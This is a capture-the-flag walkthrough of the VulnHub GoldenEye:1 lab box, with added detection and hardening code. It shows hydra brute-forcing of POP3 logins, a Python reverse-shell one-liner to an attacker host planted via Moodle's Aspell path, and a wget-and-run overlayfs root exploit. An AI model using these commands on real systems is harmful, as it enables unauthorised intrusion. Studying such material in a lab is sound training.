VulnHub machine walkthrough [GoldenEye-1]

Release

Name: GoldenEye:1
Release date: 4 May 2018

Download

  • Download: https://drive.google.com/open?id=1M7mMdSMHHpiFKW3JLqq8boNrI95Nv4tq
  • Download (Mirror): https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova
  • Download (Torrent): https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova.torrent

Description

Level: Intermediate

Recently completed work on an OSCP-style vulnerable machine themed on the great James Bond film (and even better N64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt. I rate it intermediate: it takes several techniques to root, with no exploit development / buffer overflows. Having finished OSCP, I thought this would be good practice, with a bit of CTF flavour on top. I built and verified it on VMware and VirtualBox. You should not need any tools beyond the defaults. It needs to be set to "host only", and on VMware, because of the formatting, you may need to click "Retry" if prompted when first booting it.

Beta-2018-05-02 v1-2018-05-04

GoldenEye is a secret-service-themed challenge created by creosote and hosted on VulnHub. GoldenEye is a CTF-style box rather than a realistic penetration-testing scenario. Getting root on this box takes a fair amount of "out of the box" thinking.

Information gathering

Start with nmap

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.101
Host is up (0.00025s latency).
MAC Address: 08:00:27:3B:86:3C (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -p- -n -Pn -v -sV 192.168.56.101
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open ssl/unknown
55007/tcp open pop3 Dovecot pop3d

Besides the web application on port 80 there are two POP3 ports and one SMTP port. The main application suggests navigating to /sev-home/. However, browsing to /sev-home/ prompts for a username and password, and at this point I know nothing about any credentials.

root@kali:~# nmap -p 25,80,55006,55007 -A -v -Pn -n -sV -T5 --script=vuln --min-rate=10000 192.168.56.101
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_WITH_AES_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: postfix builtin
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
| https://www.ietf.org/rfc/rfc2246.txt
|
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: BID:74733 CVE:CVE-2015-4000
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
| https://weakdh.org
| https://www.securityfocus.com/bid/74733
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: postfix builtin
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown:
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
55006/tcp open ssl/unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown:
55007/tcp open pop3 Dovecot pop3d
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown:
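The vuln scan above flags the same three TLS weaknesses on the Postfix and Dovecot ports: anonymous DH (no server authentication), export-grade DH (Logjam) and SSLv3 (POODLE). The following parser, an added example that is not part of the original post, reads that NSE output format, reports each weak DH group and SSLv3 finding per port, and maps the daemon to the Postfix / Dovecot settings that close them; the NMAP_OUTPUT excerpt is constructed from the findings shown above, and the Dovecot keys are the 2.2-era names (Ubuntu 14.04), which Dovecot 2.3 renamed.

```python
import re
# Constructed excerpt of the nmap --script=vuln output shown above, reduced to
# the lines this parser reads; it is sample input, not the raw scan.
NMAP_OUTPUT = """\
25/tcp open smtp Postfix smtpd
| ssl-dh-params:
|   ANONYMOUS DH GROUP 1
|     Cipher Suite: TLS_DH_anon_WITH_AES_128_CBC_SHA
|     Modulus Length: 1024
|   EXPORT-GRADE DH GROUP 1
|     Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|     Modulus Length: 512
| ssl-poodle:
|   State: VULNERABLE
55007/tcp open pop3 Dovecot pop3d
| ssl-dh-params:
|   WEAK DH GROUP 1
|     Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|     Modulus Length: 1024
"""
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s*(.*)$")
SUITE_RE = re.compile(r"Cipher Suite:\s*(\S+)")
MODULUS_RE = re.compile(r"Modulus Length:\s*(\d+)")
# Postfix keys are current names; the Dovecot keys are the 2.2-era names that
# ship with Ubuntu 14.04 (Dovecot 2.3 renamed them).
REMEDIATION = {
    "Postfix": ["smtpd_tls_protocols = !SSLv2, !SSLv3",
                "smtpd_tls_exclude_ciphers = aNULL, EXPORT, LOW, DES, RC4, MD5",
                "smtpd_tls_dh1024_param_file = /etc/postfix/dh2048.pem"],
    "Dovecot": ["ssl_protocols = !SSLv2 !SSLv3", "ssl_dh_parameters_length = 2048",
                "ssl_cipher_list = HIGH:!aNULL:!EXPORT:!LOW:!DES:!RC4:!MD5"]}


def parse_tls_findings(text, min_dh_bits=2048):
    """port -> {"service", "issues"} for ports with anon/export DH, short DH, SSLv3."""
    findings, port, suite, in_poodle = {}, None, None, False
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            port, suite, in_poodle = m.group(1), None, False
            findings[port] = {"service": m.group(2).strip(), "issues": []}
            continue
        if port is None:
            continue
        line = raw.lstrip("|_ ").strip()
        issues = findings[port]["issues"]
        if line.startswith("ssl-"):  # a new NSE script section begins
            in_poodle = line.startswith("ssl-poodle")
        elif in_poodle and line == "State: VULNERABLE":
            issues.append("SSLv3 enabled (POODLE, CVE-2014-3566)")
        m = SUITE_RE.search(line)
        if m:
            suite = m.group(1)
            if "_anon_" in suite:
                issues.append(f"anonymous DH suite {suite} (no server authentication)")
            elif "_EXPORT_" in suite:
                issues.append(f"export-grade suite {suite} (Logjam, CVE-2015-4000)")
        m = MODULUS_RE.search(line)
        if m and suite and int(m.group(1)) < min_dh_bits:
            issues.append(f"{m.group(1)}-bit DH modulus with {suite}")
    return {p: f for p, f in findings.items() if f["issues"]}


def remediation_for(service):
    """Config lines for the daemon named in nmap's service/version column."""
    return next((v for k, v in REMEDIATION.items() if k.lower() in service.lower()), [])
```

Generate the 2048-bit group with `openssl dhparam -out /etc/postfix/dh2048.pem 2048` before pointing Postfix at it.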

Time to dig deeper! In the page's HTML source I found the JavaScript file responsible for the pretty front-page animation. In terminal.js I found the first hint: a hard-coded password for boris, stored as HTML entities, which is trivial to decode. That gave me credentials to access the application.

&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;

===>

InvincibleHack3r

That gives the account boris/InvincibleHack3r; log in with it.

Accessing the application turned up nothing useful. I tried the same credentials against the POP3 service to check whether agent Boris had any interesting email, but the password I had does not work for POP3 access. Honestly, I was stuck here for a while.
With no other leads, I ran a quick brute force against the POP3 service with the username boris. Hydra cracked the password using the fasttrack.txt wordlist shipped with Kali.

root@kali:~# hydra -l boris -P /usr/share/wordlists/fasttrack.txt -t20 192.168.56.101 -s55007 -I pop3
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-09 21:37:45
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 20 tasks per 1 server, overall 20 tasks, 222 login tries (l:1/p:222), ~12 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 122 to do in 00:02h, 20 active
[55007][pop3] host: 192.168.56.101 login: boris password: secret1!
[STATUS] 111.00 tries/min, 222 tries in 00:02h, 1 to do in 00:01h, 19 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-09 21:39:45
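Each of the hydra runs in this walkthrough (boris, and later natalya and doak) leaves the same trace in the Dovecot log: a burst of `auth failed` disconnects from one client IP, then a successful `Login` from that IP. The detector below is an added example, not part of the original post; it assumes Dovecot 2.2's default pop3-login syslog format (the version on Ubuntu 14.04) and builds a constructed log rather than reading a real one.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Dovecot 2.2 pop3-login syslog format (the Dovecot version on Ubuntu 14.04).
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed, \d+ attempts in \d+ secs\)): "
    r"user=<(?P<user>[^>]*)>, .*?rip=(?P<rip>[\d.]+)")


def _ts(s, year=2020):
    """Syslog timestamps carry no year; the caller supplies one."""
    return datetime.strptime(f"{year} {s}", "%Y %b %d %H:%M:%S")


def constructed_log(n_fail=25, rip="192.168.56.102", user="boris"):
    """Constructed sample: one benign login, then n_fail hydra-style failures
    one second apart from rip, then the successful login that ends the run."""
    t = _ts("Jan  9 21:37:00")

    def stamp(d):
        return f"{d:%b} {d.day:2d} {d:%H:%M:%S} ubuntu dovecot: pop3-login: "
    lines = [stamp(t) + "Login: user=<natalya>, method=PLAIN, rip=10.0.0.5, "
             "lip=192.168.56.101, mpid=900, session=<ok>"]
    for i in range(1, n_fail + 1):
        lines.append(stamp(t + timedelta(seconds=i)) + "Disconnected (auth failed, 1 attempts in 1 secs): "
                     f"user=<{user}>, method=PLAIN, rip={rip}, lip=192.168.56.101, session=<s{i}>")
    lines.append(stamp(t + timedelta(seconds=n_fail + 1)) +
                 f"Login: user=<{user}>, method=PLAIN, rip={rip}, lip=192.168.56.101, mpid=901, session=<hit>")
    return lines


def detect_pop3_bruteforce(lines, threshold=20, window_s=120):
    """Alert on a (rip, user) pair with >= threshold auth failures inside
    window_s seconds, and again when a Login from that rip follows the burst;
    the second alert is the 'password found' moment of the hydra runs above."""
    failures = defaultdict(deque)  # (rip, user) -> failure timestamps in window
    burst_last = {}                # rip -> time of the latest failure in a burst
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        t, rip, user = _ts(m["ts"]), m["rip"], m["user"]
        if m["event"].startswith("Disconnected"):
            q = failures[(rip, user)]
            q.append(t)
            while (t - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold:
                burst_last[rip] = t
            if len(q) == threshold:  # fire once per burst, not per attempt
                alerts.append(f"bruteforce rip={rip} user={user}: {threshold} failures in {window_s}s")
        elif rip in burst_last and (t - burst_last[rip]).total_seconds() <= window_s:
            alerts.append(f"login after bruteforce rip={rip} user={user}")
    return alerts
```

On the real box the fix is simpler than the detector: rate-limit or fail2ban the pop3-login service and retire passwords that appear in fasttrack.txt.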

That gives boris/secret1!; connect with telnet.

root@kali:~# telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user boris
+OK
pass secret1!
+OK Logged in.
retr 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
retr 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.

The content of the email exchange is not directly exploitable, but it reveals the usernames of the other agents working on the mission. The same attack can be run against those other agents. Luckily, natalya was found.

root@kali:~# hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -t64 192.168.56.101 -s55007 -I pop3
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-09 21:46:23
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 64 tasks per 1 server, overall 64 tasks, 222 login tries (l:1/p:222), ~4 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[55007][pop3] host: 192.168.56.101 login: natalya password: bird
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-09 21:46:39

natalya/bird; log in.

root@kali:~# telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

Key information from retr 2: the new student's credentials are xenia / RCP90rulez!, the training site is at severnaya-station.com/gnocertdir on the internal domain, and since that name only resolves on the internal network, the server's IP has to be mapped to severnaya-station.com in /etc/hosts.

Edit the hosts file to point 192.168.56.101 at severnaya-station.com, then visit severnaya-station.com/gnocertdir.

Now I can browse to severnaya-station.com/gnocertdir and access the training portal as xenia. The learning portal runs on the open-source learning platform Moodle. No course material or attachments are accessible from the portal. However, there is a message from Dr. Doak, the GoldenEye project supervisor, in which he says his email username is not correct. I tried a hydra attack against the POP3 service.

root@kali:~# hydra -l doak -P /usr/share/wordlists/fasttrack.txt -t64 192.168.56.101 -s55007 -I pop3
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-09 22:21:03
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 64 tasks per 1 server, overall 64 tasks, 222 login tries (l:1/p:222), ~4 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[55007][pop3] host: 192.168.56.101 login: doak password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-09 22:21:32

doak/goat

That is the dumbest password a secret service agent could use! Still, with the newly found credentials I can read the email. From the email I found the credentials to access Moodle as agent Doak.

root@kali:~# telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

username: dr_doak
password: 4England!

In Dr. Doak's account I found an interesting attachment, which says the application's admin credentials can be obtained from /dir007key/for-007.jpg. Steganography can be used to embed a secret message in an image.

root@kali:~# exiftool 007.jpg 
ExifTool Version Number : 11.80
File Name : 007.jpg
Directory : .
File Size : 15 kB
File Modification Date/Time : 2020:01:09 22:37:50-05:00
File Access Date/Time : 2020:01:09 22:37:50-05:00
File Inode Change Date/Time : 2020:01:09 22:37:50-05:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
X Resolution : 300
Y Resolution : 300
Exif Byte Order : Big-endian (Motorola, MM)
Image Description : eFdpbnRlcjE5OTV4IQ==
Make : GoldenEye
Resolution Unit : inches
Software : linux
Artist : For James
Y Cb Cr Positioning : Centered
Exif Version : 0231
Components Configuration : Y, Cb, Cr, -
User Comment : For 007
Flashpix Version : 0100
Image Width : 313
Image Height : 212
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 313x212
Megapixels : 0.066

Base64-decoding the Image Description string gives: xWinter1995x!

Then log in with admin/xWinter1995x!
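Both secrets on this box (the boris password as HTML entities in terminal.js, the admin password as base64 in the JPEG's Image Description tag) are encoded, not encrypted, so a secret scan over source files and image metadata finds them. The finder below is an added example, not part of the original post or the Moodle project; the SAMPLES dictionary is constructed to mirror the two findings, not copied from the box's files.

```python
import base64
import html
import re

# Constructed samples standing in for the two places the walkthrough found
# obfuscated secrets: an HTML-entity run in a JavaScript file (terminal.js) and
# a base64 string in a JPEG's EXIF "Image Description" tag. Not the real files.
SAMPLES = {
    "terminal.js": 'var pw = "&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;";',
    "for-007.jpg:ImageDescription": "eFdpbnRlcjE5OTV4IQ==",
    "app.js": "var build = 'abcd1234';",  # short base64-looking noise that must not be reported
}

ENTITY_RUN = re.compile(r"(?:&#x?[0-9a-fA-F]+;){4,}")
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")


def _printable(s):
    return bool(s) and all(32 <= ord(c) < 127 for c in s)


def find_encoded_strings(text):
    """Return [(kind, raw, decoded)] for entity runs and base64 tokens that
    decode to printable ASCII, which is what a hard-coded secret looks like."""
    hits = []
    for m in ENTITY_RUN.finditer(text):
        decoded = html.unescape(m.group())
        if _printable(decoded):
            hits.append(("html-entity", m.group(), decoded))
    for m in B64_TOKEN.finditer(text):
        tok = m.group()
        if len(tok) % 4:  # real base64 is padded to a multiple of 4
            continue
        try:
            decoded = base64.b64decode(tok, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if _printable(decoded):
            hits.append(("base64", tok, decoded))
    return hits


def scan(samples):
    """Run the finder over every named sample; keep only those with hits."""
    found = {name: find_encoded_strings(text) for name, text in samples.items()}
    return {name: hits for name, hits in found.items() if hits}
```

For real images, feed the tag values from `exiftool -j` into `scan` the same way; the length and padding checks keep ordinary identifiers out of the report.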

getshell

  • Moodle admin account remote code execution

With admin access to Moodle, getting a reverse shell is fairly easy. Under Moodle's settings there is a page for configuring system paths. Aspell is a spell checker that can be installed on Linux and used by Moodle for spell-checking operations. Whenever a spell-check action is started, Moodle invokes the Aspell binary. The Aspell path can be edited to obtain a reverse shell. Below is the payload I used.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Once the path is set, create any blog post or page. In the editor, invoking the spellcheck function gives the reverse shell connection.

Then set the option shown in the figure below to PspellShell; without that, the payload above will not execute...

After clicking the button in the figure above, a shell came back on the Kali side.

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.101: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 48087
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/sh")'

Privilege escalation

I first enumerated the box's OS version. It was an Ubuntu 14.04.1 box. A Google search showed the machine is vulnerable to the overlayfs exploit EDB-37292. I compiled it on Kali and transferred it to the target box. Running the exploit gave the error: sh: 1: gcc: not found.

There is no gcc on the target box. If we check the exploit-db 37292 exploit code, on line 143 you can see the exploit calls gcc. Well, that's tricky.

I enumerated the box with linuxprivchecker.py to list the installed development tools. There is no gcc on the box, but there is cc. cc is the name of the original UNIX C compiler command. I'm no expert on the exact difference between cc and gcc. I tried changing gcc to cc in the exploit source and compiling it. The resulting binary got me root on the box.

After compiling the exploit on Kali, wget it into the shell on the target, give it 777 permissions and run ./exp; privilege escalation succeeds.

$ wget http://192.168.56.102:8000/exp
wget http://192.168.56.102:8000/exp
--2020-01-10 06:24:47-- http://192.168.56.102:8000/exp
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17616 (17K) [application/octet-stream]
Saving to: 'exp'

100%[======================================>] 17,616 --.-K/s in 0s

2020-01-10 06:24:47 (331 MB/s) - 'exp' saved [17616/17616]

$ ls
ls
changelog.txt config.php editor_plugin.js exp includes
classes css editor_plugin_src.js img rpc.php
$ chmod 777 *
chmod 777 *
$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root

Found the flag. Awesome...

# cd /root
cd /root
# ls
ls
# pwd
pwd
/root
# ls -la
ls -la
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

This is the final flag.

An animated image, quite interesting.

  • Summary of key points:

1. Mail leakage via telnet
2. Image steganography
3. Moodle admin account remote code execution
4. Ubuntu 14.04.1 privilege escalation
5. overlayfs exploit [EDB-37292] compiled with cc

Game over

Sorry, this time I still haven't found that Greek guru's foolproof one-click clear script, i am so sorry about this... It's a pity...

The end, to be continued...